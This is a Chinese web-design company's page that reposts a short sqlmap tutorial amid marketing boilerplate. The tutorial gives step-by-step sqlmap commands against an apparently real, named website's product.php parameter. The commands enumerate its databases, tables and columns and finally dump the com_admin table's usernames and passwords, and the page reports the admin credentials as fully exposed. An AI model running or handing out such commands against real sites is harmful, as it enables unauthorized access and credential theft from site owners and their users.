资讯

精准传达 • 有效沟通

从品牌网站建设到网络营销策划,从策略到执行的一站式服务

sqlmap的使用

用sqlmap进行注入

十载的双台子网站建设经验,针对设计、前端、开发、售后、文案、推广等六对一服务,响应快,48小时及时工作处理。成都营销网站建设的优势是能够根据用户设备显示端的尺寸不同,自动调整双台子建站的显示方式,使网站能够适用不同显示终端,在浏览器中调整网站的宽度,无论在任何一种浏览器上浏览网站,都能展现优雅布局与设计,从而大程度地提升浏览体验。成都创新互联从事“双台子网站设计”,“双台子网站推广”以来,每个客户项目都认真落实执行。

1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。

sqlamp.py -u“http://www.gaoneng.com/product.php?cid=71”

sqlmap的使用 

可以看出此处存在sql注入漏洞。

2、

sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”

--dbs 可以跑出存在的数据库名

sqlmap的使用 

然后可以跑gaoneng数据库中的表

Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71” -D gaoneng --tables

sqlmap的使用 

既然已经爆出数据库里的表,那就可以爆出表中的字段

Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”

-D gaoneng -T com_admin --columns

sqlmap的使用 

可以看到这个表中存在我们需要的字段,密码与用户名

Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71” 

-D gaoneng -T com_admin -C username,password --dump

sqlmap的使用 

由此这个网站的管理员密码与用户名已被完全爆出。


分享题目:sqlmap的使用
转载源于:http://cdkjz.cn/article/jeipjg.html
多年建站经验

多一份参考,总有益处

联系快上网,免费获得专属《策划方案》及报价

咨询相关问题或预约面谈,可以通过以下方式与我们联系

大客户专线   成都:13518219792   座机:028-86922220